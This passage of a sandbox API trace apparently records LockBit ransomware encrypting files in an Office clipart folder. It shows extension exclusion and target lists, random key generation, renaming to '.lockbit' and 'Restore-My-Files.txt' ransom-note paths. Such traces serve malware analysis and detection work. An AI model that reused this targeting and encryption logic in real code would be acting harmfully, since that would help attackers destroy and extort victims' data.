(lpString1=".ini", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152436.WMF") returned 1 [0144.584] lstrcmpiW (lpString1="ntldr", lpString2="J0152436.WMF") returned 1 [0144.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152436.WMF") returned 1 [0144.584] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152436.WMF") returned -1 [0144.584] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152436.WMF") returned -1 [0144.584] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152436.WMF") returned 1 [0144.584] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152436.WMF") returned -1 [0144.584] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.584] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned=".WMF" [0144.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.584] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.584] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.585] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.585] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.585] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.585] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.585] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.585] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.585] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.585] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.585] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.585] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF.lockbit") returned 72 [0144.585] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.586] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.586] malloc (_Size=0x40068) returned 0x3df0008 [0144.586] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11340) returned 1 [0144.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.587] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.593] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.593] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.593] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.595] free (_Block=0x1fa2ed8) [0144.595] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.595] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.595] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.595] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4030, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152556.WMF", cAlternateFileName="")) returned 1 [0144.595] lstrcmpiW (lpString1=".", lpString2="J0152556.WMF") returned -1 [0144.595] lstrcmpiW (lpString1="..", lpString2="J0152556.WMF") returned -1 [0144.595] PathFindExtensionW (pszPath="J0152556.WMF") returned=".WMF" [0144.595] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.595] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.595] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.595] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.595] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.595] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.596] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.596] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152556.WMF") returned 1 [0144.597] lstrcmpiW (lpString1="ntldr", lpString2="J0152556.WMF") returned 1 [0144.597] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152556.WMF") returned 1 [0144.597] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152556.WMF") returned -1 [0144.597] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152556.WMF") returned -1 [0144.597] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152556.WMF") returned 1 [0144.597] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152556.WMF") returned -1 [0144.597] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.597] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned=".WMF" [0144.597] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.597] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.598] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.598] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.598] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF.lockbit") returned 72 [0144.599] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.600] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.600] malloc (_Size=0x40068) returned 0x3df0008 [0144.600] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16432) returned 1 [0144.600] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.600] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.601] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.601] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.609] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.609] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.609] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.611] free (_Block=0x1fa2ed8) [0144.611] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.611] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.611] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.611] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152558.WMF", cAlternateFileName="")) returned 1 [0144.611] lstrcmpiW (lpString1=".", lpString2="J0152558.WMF") returned -1 [0144.611] lstrcmpiW (lpString1="..", lpString2="J0152558.WMF") returned -1 [0144.611] PathFindExtensionW (pszPath="J0152558.WMF") returned=".WMF" [0144.611] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.611] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.611] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.611] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.612] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.612] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.613] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152558.WMF") returned 1 [0144.613] lstrcmpiW (lpString1="ntldr", lpString2="J0152558.WMF") returned 1 [0144.613] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152558.WMF") returned 1 [0144.613] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152558.WMF") returned -1 [0144.613] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152558.WMF") returned -1 [0144.613] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152558.WMF") returned 1 [0144.613] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152558.WMF") returned -1 [0144.613] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.614] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned=".WMF" [0144.614] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.614] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.614] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.615] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.615] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.615] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF.lockbit") returned 72 [0144.615] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.616] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.616] malloc (_Size=0x40068) returned 0x3df0008 [0144.616] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16052) returned 1 [0144.616] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.616] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.617] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.617] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.617] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.635] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.636] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.636] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.637] free (_Block=0x1fa2ed8) [0144.637] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.638] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.638] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program 